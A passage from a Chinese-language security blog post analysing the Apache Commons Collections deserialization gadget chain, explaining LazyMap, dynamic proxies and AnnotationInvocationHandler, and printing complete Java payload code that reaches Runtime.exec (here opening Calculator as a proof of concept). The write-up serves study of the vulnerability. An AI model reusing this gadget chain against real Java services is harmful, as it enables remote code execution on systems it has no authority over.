<h3 id="Payload2"><a href="#Payload2" class="headerlink" title="Payload2"></a>Payload2</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">ObjectInputStream.readObject()</span><br><span class="line">            AnnotationInvocationHandler.readObject()</span><br><span class="line">                Map(Proxy).entrySet()</span><br><span class="line">                    AnnotationInvocationHandler.invoke()</span><br><span class="line">                        LazyMap.get()</span><br><span class="line">                            ChainedTransformer.transform()</span><br><span class="line">                                ConstantTransformer.transform()</span><br><span class="line">                                InvokerTransformer.transform()</span><br><span class="line">                                    Method.invoke()</span><br><span class="line">                                        Class.getMethod()</span><br><span class="line">                                InvokerTransformer.transform()</span><br><span class="line">                                    Method.invoke()</span><br><span class="line">                                        Runtime.getRuntime()</span><br><span class="line">                                InvokerTransformer.transform()</span><br><span class="line">                                    Method.invoke()</span><br><span class="line">                                        Runtime.exec()</span><br></pre></td></tr></table></figure>
<p>从 <code>ChainedTransformer.transform()</code> 往下之前都分析过了，直接看到 <code>LazyMap.get()</code><br><img src="http://x-f1v3.github.io/images/1604563326217.png" alt="image"></p>
<p>在 <code>get</code> 方法中，当 <code>map</code> 不包含 <code>key</code> 时，会执行 <code>this.factory.transform(key)</code>,其中 <code>this.factory</code> 是传入的 <code>Transformer</code> 类，这和下面的 <code>ChainedTransformer</code> 利用链就可以联动了。<br>代码：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">Transformer[] transformers = &#123;</span><br><span class="line">           new ConstantTransformer(Runtime.class),</span><br><span class="line">           new InvokerTransformer(&quot;getMethod&quot;, new Class[]&#123; String.class, Class[].class&#125;, new Object[]&#123;&quot;getRuntime&quot;, new Class[0] &#125;),</span><br><span class="line">           new InvokerTransformer(&quot;invoke&quot;, new Class[]&#123; Object.class, Object[].class&#125;, new Object[]&#123; null ,new Object[0]&#125; ),</span><br><span class="line">           new InvokerTransformer(&quot;exec&quot;,</span><br><span class="line">                   new Class[] &#123;String.class &#125;,</span><br><span class="line">                   new Object[] &#123;&quot;open /Applications/Calculator.app&quot;&#125;)</span><br><span class="line">   &#125;;</span><br><span class="line">Transformer transformerChain = new ChainedTransformer(transformers);</span><br><span class="line">Map innerMap = new HashMap();</span><br><span class="line">//调用 decorate 方法，返回 LazyMap 的实例</span><br><span class="line">Map lazyMap = LazyMap.decorate(innerMap, transformerChain);</span><br><span class="line">lazyMap.get(&quot;A&quot;);</span><br></pre></td></tr></table></figure></p>
<p><img src="http://x-f1v3.github.io/images/1604563338653.png" alt="image"></p>
<p>接下来是 <code>Map(Proxy).entrySet()</code><br>这里需要些 Java 动态代理的知识。简单的说，就是使用 JDK 动态代理时，会调用动态代理类的 invoke 方法，<br>而每一个动态代理类都必须要实现 <code>InvocationHandler</code> 这个接口,在看 <code>AnnotationInvocationHandler</code> ,就是一个动态代理类，<br><img src="http://x-f1v3.github.io/images/1604563349603.png" alt="image"></p>
<p>看到它的 <code>invoke</code> 方法，其中就有 <code>Object var6 = this.memberValues.get(var4);</code>，如果 <code>this.memberValues</code> 是构造好的 <code>LazyMap</code> 就能执行 <code>LazyMap.get()</code>了。<br>如何完成动态代理呢？一般通过 <code>Proxy</code> 的 <code>newProxyInstance</code> 完成动态代理</p>
<blockquote>
<p>public static Object newProxyInstance(ClassLoader loader, Class&lt;?&gt;[] interfaces,  InvocationHandler h)  throws IllegalArgumentException</p>
<p>loader: 定义了由哪个ClassLoader对象来对生成的代理对象进行加载,<br>interfaces: 将要给需要代理的对象提供一组什么接口，<br>h: 要调用实现的那种接口中的方法，会跳转到由这个代理对象关联到的 handler 中的invoke方法去执行,</p>
</blockquote>
<p>很明显，动态代理的 <code>InvocationHandler</code> 就是 <code>AnnotationInvocationHandler</code> 了。</p>
<p>继续看 <code>AnnotationInvocationHandler.readObject</code><br><img src="http://x-f1v3.github.io/images/1604563367123.png" alt="image"></p>
<p>其中有 <code>Map(Proxy).entrySet()</code> 对应到了 <code>this.memberValues.entrySet().iterator()</code>，也可以从 <code>AnnotationInvocationHandler</code> 的构造方法可以看出 <code>this.memberValues</code> 是 <code>Map</code> 类。如果反序列化入口点只能是 <code>AnnotationInvocationHandler</code> 类的话，那么最明显的思路就是初始化 <code>AnnotationInvocationHandler</code> 类的 <code>Map</code> 是经过传入 <code>lazyMap</code> 的 <code>AnnotationInvocationHandler</code> 实例动态代理的 <code>Map</code>。稍微有点绕口，代码比较清晰。<br><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">Constructor handler_constructor = Class.forName(<span class="string">"sun.reflect.annotation.AnnotationInvocationHandler"</span>).getDeclaredConstructor(Class.class,Map.class); </span><br><span class="line">handler_constructor.setAccessible(<span class="keyword">true</span>);</span><br><span class="line">InvocationHandler map_handler = (InvocationHandler) </span><br><span class="line"><span class="comment">//初始化AnnotationInvocationHandler，传入特殊构造的lazyMap</span></span><br><span class="line"><span class="comment">//这个AnnotationInvocationHandler实例，是作为动态代理的handler，</span></span><br><span class="line"><span class="comment">//所以，当执行代理对象的接口方法时，会关联到 handler 的 invoke 方法去执行</span></span><br><span class="line">handler_constructor.newInstance(Override.class,lazyMap); </span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment">//使用之前的 handler 处理动态代理 Map 对象</span></span><br><span class="line">Map proxy_map = (Map) Proxy.newProxyInstance(ClassLoader.getSystemClassLoader(),<span class="keyword">new</span> Class[]&#123;Map.class&#125;,map_handler); </span><br><span class="line"></span><br><span class="line"><span class="comment">//这里的AnnotationInvocationHandler是作为反序列化readObject的入口点</span></span><br><span class="line">Constructor AnnotationInvocationHandler_Constructor = Class.forName(<span class="string">"sun.reflect.annotation.AnnotationInvocationHandler"</span>).getDeclaredConstructor(Class.class,Map.class);</span><br><span class="line">AnnotationInvocationHandler_Constructor.setAccessible(<span class="keyword">true</span>);</span><br><span class="line">InvocationHandler handler = (InvocationHandler)AnnotationInvocationHandler_Constructor.newInstance(Override.class,proxy_map);</span><br></pre></td></tr></table></figure></p>
<p>完整 Payload<br><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">Transformer[] transformers = &#123;</span><br><span class="line">        <span class="keyword">new</span> ConstantTransformer(Runtime.class),</span><br><span class="line">        <span class="keyword">new</span> InvokerTransformer(<span class="string">"getMethod"</span>, <span class="keyword">new</span> Class[]&#123; String.class, Class[].class&#125;, <span class="keyword">new</span> Object[]&#123;<span class="string">"getRuntime"</span>, <span class="keyword">new</span> Class[<span class="number">0</span>] &#125;),</span><br><span class="line">        <span class="keyword">new</span> InvokerTransformer(<span class="string">"invoke"</span>, <span class="keyword">new</span> Class[]&#123; Object.class, Object[].class&#125;, <span class="keyword">new</span> Object[]&#123; <span class="keyword">null</span> ,<span class="keyword">new</span> Object[<span class="number">0</span>]&#125; ),</span><br><span class="line">        <span class="keyword">new</span> InvokerTransformer(<span class="string">"exec"</span>,</span><br><span class="line">                <span class="keyword">new</span> Class[] &#123;String.class &#125;,</span><br><span class="line">                <span class="keyword">new</span> Object[] &#123;<span class="string">"open /Applications/Calculator.app"</span>&#125;)</span><br><span class="line">&#125;;</span><br><span class="line">Transformer transformerChain = <span class="keyword">new</span> ChainedTransformer(transformers);</span><br><span class="line">HashMap innermap = <span class="keyword">new</span> HashMap();</span><br><span class="line">Map lazyMap = LazyMap.decorate(innermap, transformerChain);</span><br><span class="line"></span><br><span class="line"><span class="comment">//初始化AnnotationInvocationHandler，传入特殊构造的lazyMap</span></span><br><span class="line"><span class="comment">//这个AnnotationInvocationHandler实例，是作为动态代理的handler，</span></span><br><span class="line"><span class="comment">//所以，当执行代理对象的接口方法时，会关联到 handler 的 invoke 方法去执行</span></span><br><span class="line">Constructor handler_constructor = Class.forName(<span class="string">"sun.reflect.annotation.AnnotationInvocationHandler"</span>).getDeclaredConstructor(Class.class,Map.class);</span><br><span class="line">handler_constructor.setAccessible(<span class="keyword">true</span>);</span><br><span class="line">InvocationHandler map_handler = (InvocationHandler) handler_constructor.newInstance(Override.class,lazyMap); <span class="comment">//创建第一个代理的handler</span></span><br><span class="line"></span><br><span class="line"><span class="comment">//使用之前的 handler 处理动态代理 Map 对象</span></span><br><span class="line">Map proxy_map = (Map) Proxy.newProxyInstance(ClassLoader.getSystemClassLoader(),<span class="keyword">new</span> Class[]&#123;Map.class&#125;,map_handler); <span class="comment">//创建proxy对象</span></span><br><span class="line"></span><br><span class="line"><span class="comment">//这里的AnnotationInvocationHandler是作为反序列化 readObject 的入口点</span></span><br><span class="line">Constructor AnnotationInvocationHandler_Constructor = Class.forName(<span class="string">"sun.reflect.annotation.AnnotationInvocationHandler"</span>).getDeclaredConstructor(Class.class,Map.class);</span><br><span class="line">AnnotationInvocationHandler_Constructor.setAccessible(<span class="keyword">true</span>);</span><br><span class="line">InvocationHandler handler = (InvocationHandler)AnnotationInvocationHandler_Constructor.newInstance(Override.class,proxy_map);</span><br></pre></td></tr></table></figure></p>
<p><img src="http://x-f1v3.github.io/images/1604563382564.png" alt="image"></p>

    </div>

    
    
    

      <footer class="post-footer">
          
          <div class="post-tags">
              <a href="/tags/Java/" rel="tag"><i class="fa fa-tag"></i> Java</a>
              <a href="/tags/反序列化/" rel="tag"><i class="fa fa-tag"></i> 反序列化</a>
              <a href="/tags/代码审计/" rel="tag"><i class="fa fa-tag"></i> 代码审计</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/blog/1597283762460.html" rel="prev" title="URLDNS 反序列化">
      <i class="fa fa-chevron-left"></i> URLDNS 反序列化
    </a></div>
      <div class="post-nav-item">
    <a href="/blog/1604564457789.html" rel="next" title="Weblogic CVE-2020-14825 分析">
      Weblogic CVE-2020-14825 分析 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#依赖环境"><span class="nav-number">1.</span> <span class="nav-text">依赖环境</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#触发流程"><span class="nav-number">2.</span> <span class="nav-text">触发流程</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#Payload1"><span class="nav-number">2.1.</span> <span class="nav-text">Payload1</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Payload2"><span class="nav-number">2.2.</span> <span class="nav-text">Payload2</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">F1v3</p>
  <div class="site-description" itemprop="description">F1v3's Notes</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">29</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">11</span>
        <span class="site-state-item-name">categories</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">19</span>
        <span class="site-state-item-name">tags</span></a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">F1v3</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-area"></i>
    </span>
    <span title="Symbols count total">83k</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
    <span title="Reading time total">1:16</span>
</div>

        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="Total Visitors">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="Total Views">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>
<script src="/js/utils.js"></script><script src="/js/motion.js"></script>
<script src="/js/schemes/muse.js"></script>
<script src="/js/next-boot.js"></script>



  




  <script src="/js/local-search.js"></script>












  

  

</body>
</html>
